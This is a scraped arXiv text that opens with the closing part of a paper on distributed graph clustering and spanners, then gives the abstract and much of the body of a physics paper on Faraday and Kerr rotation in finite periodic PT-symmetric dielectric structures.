3. For constructing \((2k-1)\)-spanners, the upper bound \(\tilde{O}(s+n^{1+1/k})\), with a logarithmic factor hidden, is very close to the lower bound \(\Omega(s+n^{1+1/k}\log s)\). There is a small gap between the upper bound \(\tilde{O}(s+n\sqrt{n+s})\) and the lower bound \(\Omega(s+n^{3/2}\log s)\) for \(+2\)- or \(3\)-spanners. The gap is larger for \(+k\)-spanners (for \(k>2\)), where the lower bound becomes \(\Omega(s+n^{4/3-o(1)}\log s)\). But this problem also arises in the message passing model. The construction of \(+k\)-spanners often involves more complex operations and might not be easy to adapt to distributed models. ## 5 Conclusions and Future Work In this paper, we propose the first set of algorithms that can perform distributed graph clustering and spectral sparsification under edge duplication in the two well-established communication models, the message passing and the blackboard models. We show the optimality of the achieved communication costs while maintaining a clustering quality nearly as good as a naive centralized method. We also perform the first investigation of distributed algorithms for constructing graph spanners in the blackboard model under both duplication and non-duplication settings. As future work, we will study how to achieve the optimal communication complexity for distributed graph clustering while relaxing the assumption made. Furthermore, most of the existing work concentrates on global clustering but ignores local clustering, which only returns the cluster of a given seed vertex. We will devise a local clustering method that hopefully enjoys a communication cost not dependent on the size of the input graph and is more communication-efficient than traditional global graph clustering methods. Cut sparsifiers are another type of graph sparsifiers, and they can approximately preserve all the graph cut values in the original graph. Although spectral sparsifiers are also cut sparsifiers, the latter might have a smaller number of edges. Because the algorithm of [10] can be generalized to cut sparsifiers, it is promising to adapt the techniques in this work to the new problem. Finally, it is an intriguing open problem to improve the upper bounds or lower bounds and close their gap in both duplication and non-duplication models.
2301.10653
Polar magneto-optic Kerr and Faraday effects in finite periodic $\mathcal{P}\mathcal{T}$-symmetric systems
We discuss the anomalous behavior of the Faraday (transmission) and polar Kerr (reflection) rotation angles of the propagating light in finite periodic parity-time ($\mathcal{P}\mathcal{T}$) symmetric structures consisting of $N$ cells. The unit cell potential is two complex $\delta$-potentials placed on both boundaries of the ordinary dielectric slab. It is shown that, for a given set of parameters describing the system, a phase transition-like anomalous behavior of Faraday and Kerr rotation angles in parity-time symmetric systems can take place. In the anomalous phase the value of one of the Faraday and Kerr rotation angles can become negative, and both angles suffer from spectral singularities and give a strong enhancement near the singularities. We also show that the real part of the complex angle of KR, $\theta^{R}_1$, is always equal to the $\theta^{T}_1$ of FR, no matter what phase the system is in, due to the symmetry constraints. The imaginary parts of the KR angles $\theta^{R^{r/l}}_2$ are related to the $\theta^{T}_2$ of FR by parity-time symmetry. Calculations based on the approach of the generalized nonperturbative characteristic determinant, which is valid for a layered system with randomly distributed delta potentials, show that the Faraday and Kerr rotation spectrum in such structures has several resonant peaks. Some of them coincide with transmission peaks, providing simultaneous large Faraday and Kerr rotations enhanced by one or two orders of magnitude. We provide a recipe for finding a one-to-one relation between KR and FR.
Antonio Perez-Garrido, Peng Guo, Vladimir Gasparian, Esther Jódar
2023-01-25T15:52:38Z
http://arxiv.org/abs/2301.10653v1
# Polar magneto-optic Kerr and Faraday effects in finite periodic \(\mathcal{PT}\)-symmetric systems ###### Abstract We discuss the anomalous behavior of the Faraday (transmission) and polar Kerr (reflection) rotation angles of the propagating light in finite periodic parity-time (\(\mathcal{PT}\)) symmetric structures consisting of \(N\) cells. The unit cell potential is two complex \(\delta\)-potentials placed on both boundaries of the ordinary dielectric slab. It is shown that, for a given set of parameters describing the system, a phase transition-like anomalous behavior of Faraday and Kerr rotation angles in parity-time symmetric systems can take place. In the anomalous phase the value of one of the Faraday and Kerr rotation angles can become negative, and both angles suffer from spectral singularities and give a strong enhancement near the singularities. We also show that the real part of the complex angle of KR, \(\theta_{1}^{\mathrm{R}}\), is always equal to the \(\theta_{1}^{\mathrm{T}}\) of FR, no matter what phase the system is in, due to the symmetry constraints. The imaginary parts of the KR angles \(\theta_{2}^{R^{r/l}}\) are related to the \(\theta_{2}^{T}\) of FR by parity-time symmetry. Calculations based on the approach of the generalized nonperturbative characteristic determinant, which is valid for a layered system with randomly distributed delta potentials, show that the Faraday and Kerr rotation spectrum in such structures has several resonant peaks. Some of them coincide with transmission peaks, providing simultaneous large Faraday and Kerr rotations enhanced by one or two orders of magnitude. We provide a recipe for finding a one-to-one relation between KR and FR. ## I Introduction The study of magneto-optic effects (Faraday rotation (FR) and Kerr rotation (KR)) has played an important role in the development of both electromagnetic theory and atomic physics. Magneto-optical materials exhibiting FR and KR are essential for optical communication technology [1; 2; 3], optical amplifiers [4; 5], and photonic crystals [6; 7]. In addition to these important applications, the KR is also an extremely accurate and versatile research tool and can be used to determine quantities as varied as anisotropy constants, exchange-coupling strengths and Curie temperatures (see, e.g., [8]). In the polar magneto-optical Kerr effect, the magnetization of the system is in the plane of incidence and perpendicular to the reflecting surface. Reflection can produce several effects, including 1) rotation of the direction of light polarization, 2) introduction of ellipticity into the reflected beam, and 3) a change in the intensity of the reflected beam. FR is similar to KR in terms of rotation and ellipticity and has a wide range of applications in various fields of modern physics, such as measuring magnetic fields in astronomy [9] and constructing optical isolators for fiber-optic telecommunication systems [10], as well as the design of optical circulators used in the development of microwave integrated circuits [11; 12; 13]. Note that large Faraday and Kerr rotations are needed for all the applications mentioned. However, the standard method, based on increasing the sample size or applying a strong external magnetic field, is currently ineffective due to the small size of systems in which the de Broglie wavelength is comparable to the size of quantum devices.
In other words, thin film materials exhibiting a large FR angle are desirable to promote progress in optical integrated circuits. A large enhancement of the FR, as well as a change in its sign, can be obtained by incorporating several nanoparticles and their composites in nanomaterials, see e.g. Refs. [14; 15; 16]. A phase transition-like anomalous behavior of Faraday rotation angles in a simple parity-time \(\mathcal{PT}\)-symmetric model of a regular dielectric slab was reported recently in Ref. [17]. In the anomalous phase, the value of one of the Faraday rotation angles turns negative, and both angles suffer spectral singularities and yield strong enhancement near the singularities. As for the enhancement of the KR, which is also of interest here, it is mainly related to the spin-orbit coupling strength [18], to interference effects [19], as well as to the plasma resonance of the free carriers of magnetic materials [20]. As mentioned in Ref. [21], the addition of a gold nano-disc to a periodic magnetic system yields a strong wavelength-dependent enhancement of the KR. Generally, the enhancement factor is expected to be less than three even for materials with a high refractive index \(\approx 2\), such as semiconductors with zero extinction coefficients in the near or mid infrared range (like tellurium or aluminum gallium arsenide). In this paper we aim to present a complete and quantitative theoretical description of the complex Faraday and Kerr rotations for an arbitrary one-dimensional finite periodic \(\mathcal{PT}\)-symmetric system consisting of (2N+1) cells; for some simple cases we give simple closed-form expressions describing the FR and KR. We illustrate that the Faraday and Kerr rotation angles of the polarized light traveling through a \(\mathcal{PT}\)-symmetric periodic structure display phase transition-like anomalous behaviors. In one phase (normal phase), the FR and KR angles behave normally, as in a regular passive system with a positive permittivity, and stay positive all the time as expected. In the second, anomalous phase, the FR and KR angles may change sign and turn negative. In addition, spectral singularities arise in the second, anomalous phase, where the FR and KR angles increase strongly. In this sense, \(\mathcal{PT}\)-systems seem to be a good candidate for constructing fast tunable and switchable polarization rotational ultrathin magneto-optical devices in a wide frequency range with giant FR and KR rotations. Although the obtained results are, in general, only suitable for numerical analysis, in some simple cases approximate expressions can be derived and a qualitative discussion is possible. The paper is organized as follows. In Sec. II the complex Faraday and Kerr effects are introduced and discussed for a \(\mathcal{PT}\)-symmetric unit cell with two complex \(\delta\)-potentials. We will assume that the strengths of the two Dirac \(\delta\) functions \(Z_{1}\) and \(Z_{2}\) are arbitrary complex numbers. The periodic system with \(2N+1\) cells is discussed in Sec. III, followed by the discussion and summary in Sec. IV. ## II General theory of Faraday and Kerr effects in \(\mathcal{PT}\)-symmetric dielectric slabs In this section, before discussing in detail the Faraday and Kerr effects in a simple unit cell--an ordinary dielectric slab with two complex \(\delta\)-potentials located at both boundaries (the unit cell located symmetrically about \(x_{0}=0\) in Fig.
1), we present some details of the rotation angle calculation for an arbitrary one-dimensional dielectric permittivity profile \(\epsilon(x)\). Later, we will impose the condition \(\epsilon(x)=\epsilon^{*}(-x)\), which guarantees the system is \(\mathcal{PT}\)-symmetric, that its eigenstates are real-valued solutions. In such a \(\mathcal{PT}\)-symmetric dielectric system with a finite spatial extension in \(x\) direction (see Fig. 1), the permittivity of the system (as well as the single slab) has a balanced gain and loss. Assume a linearly polarized electromagnetic plane wave with angular frequency \(\omega\) enters the system from the left at normal incidence propagating along the \(x\) direction. The polarization direction of electric field of incident wave is taken as the z-axis: \(\mathbf{E}_{0}(x)=e^{ik_{0}x}\hat{z}\), where \(k_{0}=\frac{\omega}{c}\sqrt{\epsilon_{0}}\) stands for the wave vector and \(\epsilon_{0}\) denotes the dielectric constant of vacuum. A weak magnetic field \(\mathbf{B}\), which preserves the linearity of Maxwell's equations, is applied in the \(x\)-direction and is confined into the system, see Fig.1. The scattering of incident wave by the system is described by Schrodinger-like equations, see e.g. Refs. [22; 23], \[\left[\frac{d^{2}}{dx^{2}}+\frac{\omega^{2}\epsilon_{\pm}(x)}{c^{2}}\right]E _{\pm}(x)=0, \tag{1}\] Figure 1: Schematic of a one-dimesnionl \(\mathcal{PT}\)-symmetric photonic heterostructure, consisting of \(2N+1\) arbitrary number of slabs that are \(\mathcal{PT}\) -symmetric about \(x_{0}=0\), that is \(\epsilon(x)=\epsilon^{*}(-x)\). Each slab of the photonic heterostructure, has two balanced complex tiny slabs placed at both ends of a real dielectric slab. The green slab indicates the loss and the red slab indicates the gain region. where \(E_{\pm}=E_{y}\pm iE_{z}\) are circularly polarized electric fields. The \(\epsilon_{\pm}(x)\) is defined, \[\epsilon_{\pm}(x)=\begin{cases}\epsilon(x)\pm g,&x\in[-\frac{L}{2}-N(L+L_{0}), \frac{L}{2}+N(L+L_{0})],\\ \epsilon_{0},&\text{otherwise},\end{cases} \tag{2}\] where \((L,L_{0},2N+1)\) stand for spatial extent of a unit cell, the spatial separation of neighbouring two cells and number of cells, see Fig. 1. The \(g\) is the gyrotropic vector along the magnetic-field direction. The external magnetic field \(\mathbf{B}\) is included into the gyrotropic vector \(g\) to make the calculations valid for the cases of both external magnetic fields and magneto-optic materials. When the reflection within the boundaries is important, the outgoing transmitted/reflected wave is generally elliptically polarized even without absorption, where the major axis of the ellipse is rotated with respect to the original direction of polarization and the maximum FR (KR) angle does not necessarily coincide with angular frequencies \(\omega\) of light at which zero ellipticity can be measured. The real part of the rotation angle describes the change of polarization in linearly polarized light. The imaginary part describes the ellipticity of transmitted or reflected light. Once we know the scattering matrix elements \(r_{\pm}(\omega)\) and \(t_{\pm}(\omega)\) of the one-dimensional light propagation problem, e.g. 
the reflection and transmission amplitudes with an incoming propagating wave from left are defined by \[E_{\pm}(x)\rightarrow\begin{cases}\pm i\left[e^{ik_{0}x}+r_{\pm}(\omega)e^{- ik_{0}[x+L+2N(L+L_{0})]}\right],&x\rightarrow-\infty,\\ \pm it_{\pm}(\omega)e^{ik_{0}[x-L-2N(L+L_{0})]},&x\rightarrow+\infty.\end{cases} \tag{3}\] The two characteristic rotational parameters of transmitted light (magneto-optical measurements of complex Faraday angle) can be written as a complex form as (see, e.g., Refs. [22; 23]) \[\theta_{1}^{T}=\frac{\psi_{+}^{T}-\psi_{-}^{T}}{2},\hskip 14.226378pt\theta_{2}^ {T}=\frac{1}{4}\ln\frac{T_{+}}{T_{-}}, \tag{4}\] where \(T_{\pm}\) and \(\psi_{\pm}^{T}\) are the transmission coefficients and phase of transmission amplitudes, \(t_{\pm}=\sqrt{T_{\pm}}e^{i\psi_{\pm}^{T}}\), of transmitted electric fields. For weak magnetic field (\(g\ll 1\)), the perturbation expansion in terms of weak magnetic field can be applied. The leading order contribution can be obtained by expanding \(\psi_{\pm}\) and \(T\pm\) around the refractive index of the slab in the absence of the magnetic field B: \[\theta_{1}^{T}=\frac{g}{2n}\frac{\partial\psi^{T}}{\partial n},\hskip 14.226378pt \theta_{2}^{T}=\frac{g}{4n}\frac{\partial\ln T}{\partial n}, \tag{5}\] where \(n=\sqrt{\epsilon}\) is the refractive index of the slab. The Kerr rotation complex angles are defined in a similar way as in Eq.(4). In the weak magnetic field, the leading order expressions can be written in the form \[\theta_{1}^{R}=\frac{g}{2n}\frac{\partial\psi^{R}}{\partial n},\hskip 14.226378pt \theta_{2}^{R}=\frac{g}{4n}\frac{\partial\ln R}{\partial n}, \tag{6}\] where \(R\) and \(\psi^{R}\) are the reflection coefficients and phase of reflection amplitudes in the absence of magnetic field B: \(r(\omega)=\sqrt{R}e^{i\psi^{R}}\). We remark that FR and KR angles are not all independent due to the constraints of \(\mathcal{PT}\) symmetry. As mentioned in Ref. [24], the parametrization of scattering matrix only requires three independent real functions in a \(\mathcal{PT}\)-symmetric system: one inelasticity, \(\eta\in[1,\infty]\), and two phaseshifts, \(\delta_{1,2}\). In terms of \(\eta\) and \(\delta_{1,2}\), the reflection and transmission amplitudes are given by \[t=t^{r}=t^{l}=\eta\frac{e^{2i\delta_{1}}+e^{2i\delta_{2}}}{2},\hskip 14.226378ptr ^{r/l}=\eta\frac{e^{2i\delta_{1}}-e^{2i\delta_{2}}}{2}\pm i\sqrt{\eta^{2}-1}e ^{i(\delta_{1}+\delta_{2})}, \tag{7}\] where subscript \((r/l)\) are used to label amplitudes corresponding to two independent boundary conditions: right (\(e^{ik_{0}x}\)) and left (\(e^{-ik_{0}x}\)) propagating incoming waves respectively. Therefore we find relations: \[\sqrt{T}=\eta\cos(\delta_{1}-\delta_{2}),\hskip 14.226378pt\psi^{T}=\delta_{1}+ \delta_{2},\hskip 14.226378pt\sqrt{R^{r/l}}=\left|\eta\sin(\delta_{1}-\delta_{2}) \pm\sqrt{\eta^{2}-1}\right|,\hskip 14.226378pt\psi^{R}=\psi^{T}+\frac{\pi}{2}, \tag{8}\] and the pseudounitary conservation relations take place (see, e.g. Refs.[25; 26; 27]): \[|T-1|=\sqrt{R^{l}R^{r}}. \tag{9}\] The FR and KR angles are given by \[\theta_{1}^{T}=\theta_{1}^{R}=\frac{g}{2n}\frac{\partial(\delta_{1}+\delta_{2})}{ \partial n},\ \ \ \ \theta_{2}^{T}=\frac{g}{2n}\frac{\partial}{\partial n}\ln\left[\eta\cos( \delta_{1}-\delta_{2})\right],\ \ \ \ \theta_{2}^{R^{r/l}}=\frac{g}{2n}\frac{\partial}{\partial n}\ln\left|\eta\sin( \delta_{1}-\delta_{2})\pm\sqrt{\eta^{2}-1}\right|. 
\tag{10}\] The \(\theta_{2}^{R^{r/l}}\) and \(\theta_{2}^{T}\) are hence related by \[\frac{\theta_{2}^{R^{r}}+\theta_{2}^{R^{l}}}{2}=\frac{T}{T-1}\theta_{2}^{T}. \tag{11}\] We thus conclude that only three FR and KR angles are independent due to the symmetry constraints. The special case of zero inelasticity (\(\eta=0\)) thus represents the results for real spatially symmetric dielectric systems with \(\epsilon(x)=\epsilon(-x)\) and \(Im[\epsilon(x)]=0\), hence \[\theta_{2}^{T\ Im[\epsilon(x)]\to 0}\ \frac{g}{2n}\frac{\partial}{\partial n}\ln \cos(\delta_{1}-\delta_{2}),\ \ \ \ \theta_{2}^{R^{r/l}\ Im[\epsilon(x)]\to 0}\ \frac{g}{2n}\frac{\partial}{ \partial n}\ln\left|\sin(\delta_{1}-\delta_{2})\right|. \tag{12}\] III Unit cell: two complex \(\delta\)-potentials placed on both boundaries of the ordinary dielectric slab We first present some main results of FR and KR for a unit cell in this section, all the technical details can be found in Appendix A. The properties of the spectral singularities are also discussed in current section, and we draw attention to the parameter ranges where a phase-like transition can take place for both Faraday and Kerr effects. A simple \(\mathcal{PT}\)-symmetric model for a unit cell is adopted in this work: two complex \(\delta\)-potential are placed at both ends of the dielectric slab, \[\epsilon(x)=\epsilon+Z_{1}\delta(x+\frac{L}{2})+Z_{2}\delta(x-\frac{L}{2}),\ \ \ \ Z_{1}=V_{1}+iV_{2},\ \ \ \ Z_{2}=Z_{1}^{*}, \tag{13}\] where \(L\) denotes the spatial extent of unit cell of dielectric slab and \(\epsilon>0\) is positive and real permittivity of slab. The transmission \(t_{0}(\omega)\) and reflection \(r_{0}(\omega)\) amplitudes for the unit cell can be obtained rather straightforwardly by matching boundary condition method or using explicit form of characteristic determinant \(D_{2}\) in Eq.(12). First of all, inserting Eq.(11) in Eq.(13) and also using (10) it is easy to see that \(t_{0}(\omega)\), phase \(\psi^{T}\) and transmission coefficient \(T_{0}\) for a unit cell are respectively given by \[t_{0}(\omega)=\sqrt{T_{0}}e^{i\psi^{T}}=\frac{\csc\left(\frac{\omega n}{c}L \right)}{\mathcal{R}(\omega)-i\mathcal{I}(\omega)},\ \ \ \ \psi^{T}=\tan^{-1}\left[\frac{\mathcal{I}(\omega)}{\mathcal{R}(\omega)}\right], \ \ \ \ T_{0}=\frac{\csc^{2}\left(\frac{\omega n}{c}L\right)}{\mathcal{R}^{2}( \omega)+\mathcal{I}^{2}(\omega)}, \tag{14}\] where \[\mathcal{R}(\omega)=\cot\left(\frac{\omega n}{c}L\right)-\frac{\omega V_{1}}{ cn},\ \ \ \ \mathcal{I}(\omega)=\frac{\omega V_{1}}{cn_{0}}\cot\left(\frac{\omega n}{c}L \right)+\frac{1}{2}(\frac{n}{n_{0}}+\frac{n_{0}}{n})-\frac{\omega^{2}}{2c^{2} n_{0}n}\left(V_{1}^{2}+V_{2}^{2}\right). \tag{15}\] The \(n=\sqrt{\epsilon}\) and \(n_{0}=\sqrt{\epsilon_{0}}\) denote the refractive index of the dielectric slab and vacuum respectively. We remark that unphysical units are adopted throughout the rest of presentation: the length of slab \(L\) is used to sent up the physical scale, \(V_{1,2}\) and \(\epsilon=n^{2}\) hence carry the dimensions of \(1/L\) and \(1/L^{2}\) respectively. The \(\omega/c\) is a dimensionless quantity. Next the reflection amplitude \(r_{0}^{r/l}(\omega)\) to the left/right of an individual cell can be obtained conveniently from the following relation related to the derivative of the transmission amplitude \(t_{0}(Z_{1},Z_{2})\) with respect to \(Z_{1}/Z_{2}\) located on the left/right border of the slab, see Ref. 
[28]: \[r_{0}^{r}(\omega)=-i\frac{cn_{0}}{\omega}\frac{\partial\ln t_{0}(\omega)}{ \partial Z_{1}}-1,\ \ \ \ r_{0}^{l}(\omega)=-i\frac{cn_{0}}{\omega}\frac{\partial\ln t_{0}(\omega)}{ \partial Z_{2}}-1. \tag{16}\] Hence we find \[r_{0}^{r/l}(\omega)=\sqrt{R_{0}^{r/l}}e^{i\psi^{R}}=i\frac{Q^{r/l}(\omega)}{ \mathcal{R}(\omega)-i\mathcal{I}(\omega)},\ \ \ \ \psi^{R}=\tan^{-1}\left[\frac{\mathcal{I}(\omega)}{\mathcal{R}(\omega)}\right]+ \frac{\pi}{2},\ \ \ \ R_{0}^{r/l}=\frac{\left[Q^{r/l}(\omega)\right]^{2}}{\mathcal{R}^{2}( \omega)+\mathcal{I}^{2}(\omega)}, \tag{17}\] where \[Q^{r/l}(\omega)=\frac{\omega V_{1}}{cn_{0}}\cot\left(\frac{\omega n}{c}L\right) +\frac{1}{2}\bigg{(}\frac{n}{n_{0}}-\frac{n_{0}}{n}\bigg{)}\pm\frac{\omega V_{2 }}{cn}-\frac{\omega^{2}}{2c^{2}n_{0}n}\left(V_{1}^{2}+V_{2}^{2}\right). \tag{18}\] Note, that in case of \(n_{0}=n\) we recover the result of a reflection amplitude from a simple diatomic system, discussed in Ref. [29]. It is easy to verify that the phase of the reflection amplitude indeed coincides with the phase of the transmission amplitude as previously discussed. Later, in the next subsections we used these expressions to illustrate a number of quite general features of Faraday and Kerr rotations in \(\mathcal{PT}\)-symmetric periodic systems. A simple inspection of the Eq.(14), show that replacing \(\omega\) with \(-\omega\) does not affect \(t_{0}(\omega)\), which means that the transmission is equal for the left-to-right and right-to-left scattering, that is \(t_{0}^{t}(\omega)=t_{0}^{r}(-\omega)\equiv t_{0}(\omega)\). The situation is somewhat more complicated in the case of the reflection amplitude in Eq.(17). Simultaneous sign change of both \(\omega\) and \(V_{2}\) is required to satisfy the condition \(r_{0}^{l}(-\omega,-V_{2})=r_{0}^{r}(\omega,V_{2})\). There in fact are indeed the general properties of \(\mathcal{PT}\) systems, see e.g. Eq.(B33) in Ref. [24]. ### Spectral singularities in a unit cell We now turn to a closer investigation of the spectral singularities for FR and KR angles. Spectral singularities are spectral points belonging to non-Hermitian Hamiltonian operators with \(\mathcal{PT}\)-symmetry, characterized by real energies. At these energies, the reflection and transmission coefficients tend to infinity, i.e., they correspond to resonances having zero width. Interesting to note that a slight imbalance between gain and loss regions, can change the shape of the transition from zero width to the symmetric shape of the "bell curve" (for more details see Ref. [17]). For our model and for FR and KR rotational effects, spectral singularities arise when both conditions, \(\mathcal{R}(\omega)=0\) and \(\mathcal{I}(\omega)=0\), are satisfied simultaneously, see Eq.(15). By solving Eq.(15) for \(\cot(kL)\) and \(\omega\) one obtains straightforwardly \[\left(\frac{\omega_{cr}|V|}{c}\right)^{2}\cos 2\varphi_{V}+n^{2}+n_{0}^{2}=0, \hskip 14.226378pt|V|=\sqrt{V_{1}^{2}+V_{2}^{2}}, \tag{19}\] where \(\tan(\varphi_{V})=\frac{\mathcal{I}(\omega_{cr})}{\mathcal{R}(\omega_{cr})}\). The condition necessary for the existence of a solution of the spectral singularities exist only when the transmission phase is in the range \(\varphi_{V}\in[\pi/4,\pi/2]\). Hence the critical value of \(\omega_{cr}\) is defined as \[\omega_{cr}=\frac{c}{|V|}\frac{\sqrt{n^{2}+n_{0}^{2}}}{\sqrt{|\cos 2\varphi_{V} |}}, \tag{20}\] provided that \[\cot\left(\frac{\omega_{cr}}{c}nL\right)=\frac{\sqrt{n^{2}+n_{0}^{2}}}{n} \frac{\cos\varphi_{V}}{\sqrt{|\cos 2\varphi_{V}|}}. 
\tag{21}\] For a fixed \(|V|\), as follows from Eq.(20) the solutions of spectral singularities can only be found in a finite range: \(\varphi_{V}\in[\frac{\pi}{4},\varphi_{c}]\), where \(\varphi_{c}\) stands for upper bound of range. Hence as \(\varphi_{V}\) approaches lower bound of range at \(\frac{\pi}{4}\), the spectral singularity solution occurs at large frequency: \(\omega\rightarrow\infty\). When \(\varphi_{V}\) is increased, the solution of spectral singularity moves toward lower frequencies. As \(\varphi_{V}\) approaches the upper bound of range at \(\varphi_{c}\), the spectral singularity solution thus reaches its lowest value. The graphical illustration of the distribution of spectral singularities can be found in Fig.2 in Ref. [17]. ### Faraday and Kerr rotation: transmitted and reflected light A phase transition-like anomalous behavior and properties of Faraday rotation angles in a simple \(\mathcal{PT}\)-symmetric model with two complex \(\delta\)-potential placed at both boundaries of a regular dielectric slab was most recently reported in Ref.[17]. Let us recall the essential features of the FR and then focus our attention on the KR effect. In a \(\mathcal{PT}\)-symmetric systems a phase transition-like anomalous behavior of Faraday rotation angle take place. In this phase, one of Faraday rotation angles turns negative, and both angles yield strong enhancement near spectral singularities. As the consequence of \(\mathcal{PT}\) symmetry constraint, the phase of reflected amplitude \(\psi^{R}\) from left coincides with the phase of the transmission amplitude \(\psi^{T}\), see Eq.(8). Hence the real part of the complex angle of KR, \(\theta_{1}^{R}\), is always equal to the \(\theta_{1}^{T}\) of FR, no matter what phase the system is in. In this sense, the situation is similar to the passive symmetric system, where is always \(\theta_{1}^{R}=\theta_{1}^{T}\). It is interesting to note that Eq.(15) is invariant under the symmetry transform: \(V_{2}\rightarrow-V_{2}\). This is a manifestation of the fact that the phase of reflected amplitude \(\psi^{R}\) and as well as the Kerr rotation angle for the right incident light preserve the same behaviour, although the strengths of the right and left \(\delta\)-potentials on the boundaries are not equal to each other (more precisely, they are complex conjugate to each other). The mentioned asymmetry should lead to different left-to-right and right-to-left reflection amplitudes (see, e.g., [30]) and does not affect physical quantities \(\theta_{1}^{R}\) and \(\theta_{1}^{T}\), which are related to the phase accumulated during the process of reflection and transmission and as well as to the density of states. However, this asymmetry will affect \(\theta_{2}^{R}\) and \(\theta_{2}^{T}\), and they will no longer be equal to each other, see Fig. 2(c) and Fig. 2(d). This is consistent with the general statement that the Faraday and Kerr rotation profiles are very different from the corresponding curves describing ellipticities. In addition, symmetry constraint also yields the wavelength dependence of Faraday and Kerr ellipticity \(\theta_{2}^{T}\) and \(\theta_{2}^{R^{\prime}/1}\) shown in Eq.(11). Here we would like to add a few more brief comments to emphasize that upon closer look at Fig.2 reveals some details of the similarities between curves that are relevant to our further discussion. Firstly, the Faraday (Kerr) rotation local maximum/minimum (see Fig. 2) coincide with the local peak on the ellipticity curves with some accuracy. 
At those frequencies the ellipticity approaches zero non-linearly, becomes zero (linearly polarized light), and then the resulting polarization reverses its original direction. Secondly, the ellipticities (the imaginary parts of the spectra) \(\theta_{2}^{T}\) and \(\theta_{2}^{R}\) depend little on frequency and are close to zero in almost the entire frequency range, except for some regions associated with the maxima/minima or spectral singularities of the Faraday and Kerr rotations. The questions discussed above can be straightforwardly generalized to the periodic \(\mathcal{PT}\)-symmetric system. This will be done in the next section. We will show that the anomalous, phase transition-like effect occurs more often due to the complex structure of the transmission and reflection amplitudes. ### Limiting cases The phase transition-like behavior of \(\theta_{1}^{T}\) for two limiting cases (\(|V|\rightarrow\infty\) and \(V_{1}\to 0\)) was discussed in Ref. [17]. It was shown that in the case \(|V|\rightarrow\infty\) the sign of \(\theta_{1}^{T}\) is completely determined by \(\varphi_{V}\). As for the case \(V_{1}=0\) (\(\varphi_{V}\rightarrow\frac{\pi}{2}\)), the anomalous negative behavior of \(\theta_{1}^{T}\) can again be illustrated analytically for the given parameters of the problem. The latter case, that is, a \(\mathcal{PT}\)-symmetric optical lattice with a purely imaginary scattering potential, has been discussed in detail in a number of investigations, both theoretically and experimentally, see, e.g., Ref. [30] and references therein. #### iii.3.1 \(|V|\rightarrow\infty\) The situation is slightly different for the Kerr rotation. In the same limiting case \(|V|\rightarrow\infty\), given that \(\frac{n\omega L}{c}\neq\pi l\), we can show that \(\theta_{2}^{R}\propto\frac{1}{|V|^{2}}\), hence the ellipticity is almost zero for all frequencies excluding \(\frac{n\omega L}{c}=\pi l\), \(l\in\mathbb{Z}\), and the reflected light remains linearly polarized. At the discrete values \(\omega/c=\frac{\pi l}{nL}\) that yield the location of the resonance poles, \(\theta_{2}^{R}\) displays sharp peaks with narrow resonance widths. This reflects the fact that the reflected light is again linearly polarized but rotated 90 degrees from the initial direction. #### iii.3.2 \(V_{1}\to 0\) Bound state solutions of the Schrodinger equation for a \(\mathcal{PT}\)-symmetric potential with Dirac delta functions were studied in Ref. [31]. In Ref. [17] it was pointed out that, although the expression for \(\theta_{1}^{T}\) is obtained for the case \(V_{1}\to 0\), it can still explain not only the sign change of \(\theta_{1}^{T}\) (\(\theta_{1}^{R}\)) in Fig. 2(a), where \(V_{1}\neq 0\), but also the existence of the first local maximum. It is clear that the further features of \(\theta_{1}^{T}\) (\(\theta_{1}^{R}\)) in Fig. 3(a) near the frequencies of the spectral singularities are related to the behavior of \(T(\omega)\).
As for the imaginary part of the Kerr effect, \(\theta_{2}^{R^{r/l}}\), it is straightforward to show that in the same limit \(V_{1}\to 0\) the \(\theta_{2}^{R^{r/l}}\) reads \[\theta_{2}^{R^{r/l}}\stackrel{{ V_{1}\to 0}}{{\rightarrow}}\frac{g}{2nQ(\omega)}\left[\frac{1}{2}\bigg{(}\frac{1}{n_{0}}+\frac{n_{0}}{n^{2}}\bigg{)}\mp\frac{\omega}{cn^{2}}V_{2}\bigg{(}1\mp\frac{\omega}{2cn_{0}}V_{2}\bigg{)}+\frac{R_{0}^{r/l}}{Q^{r/l}(\omega)}\bigg{(}\frac{\omega L}{c}\frac{\cot(\frac{n\omega}{c}L)}{\sin^{2}(\frac{n\omega}{c}L)}-\frac{n^{2}-(n_{0}^{2}-\frac{\omega^{2}}{c^{2}}V_{2}^{2})^{2}}{4n_{0}^{2}n^{3}}\bigg{)}\right], \tag{22}\] where the reflection coefficient \(R_{0}^{r/l}\) is given by Eq.(14) and \(Q^{r/l}(\omega)\) is defined by Eq.(18). The dependence of the imaginary part of the Kerr rotation \(\theta_{2}^{R^{r}}\) (solid black line) on \(\frac{\omega}{c}\) for \(V_{1}\to 0\) is illustrated in Fig. 3. A number of basic features of \(\theta_{2}^{R}\) can be observed even in this simplest case of \(V_{1}\to 0\). One of the key features is the single resonant peak that shows up clearly when \(R_{0}\rightarrow\infty\), see Eq.(22). As mentioned above, the resonance frequencies are spectral singularities when both conditions, \(\mathcal{R}(\omega)=0\) and \(\mathcal{I}(\omega)=0\), are satisfied simultaneously. In the particular case of \(V_{1}\to 0\) there is only one \(\omega_{cr}\), which can be calculated directly from Eq.(20) by putting \(\varphi_{V}=\frac{\pi}{2}\): \(\omega_{cr}=\frac{c\sqrt{n^{2}+n_{0}^{2}}}{V_{2}}\). The second condition, \(\cot\left(\frac{\omega_{cr}}{c}nL\right)=0\), can be satisfied by choosing an appropriate value of the length, \(L=0.8\) (the system parameters are: \(n_{0}=c=V_{2}=1\), \(n=\sqrt{2}\) and \(\omega_{cr}=\sqrt{3}\)). Other maxima or minima in the Kerr rotation, located near the resonant frequencies, are associated with multiple reflections from the boundaries and are located at \(\frac{\omega_{l}n}{c}L=\pi l,\ l=1,2,\cdots\) (see the vertical pink lines in Fig. 3). Repeating calculations similar to those leading to Eq.(22), we arrive at an explicit expression for the ellipticity \(\theta_{2}^{T}\) of the Faraday rotation for this simplest case with a purely imaginary potential: \[\theta_{2}^{T}\stackrel{{ V_{1}\to 0}}{{\rightarrow}}\frac{g}{2n}\cot(kL)\frac{\omega}{c}L\left[T_{0}\left(1-\frac{\sin^{2}(kL)}{\cot(kL)}\frac{c}{\omega L}\frac{n^{2}-(n_{0}^{2}-\frac{\omega^{2}}{c^{2}}V_{2}^{2})^{2}}{4n_{0}^{2}n^{3}}\right)-1\right]. \tag{23}\] We observe that the smoothed maxima and minima that appear around the zeros of \(\sin kL\) at \(\frac{\omega_{l}n}{c}L=\pi l,\ l=1,2,\cdots\) coincide with the maxima and minima of \(\theta_{2}^{R}\) and are associated with multiple reflections from the boundaries, see, e.g., the vertical yellow lines in Fig. 3. Secondly, the large value of \(\theta_{2}^{T}\) 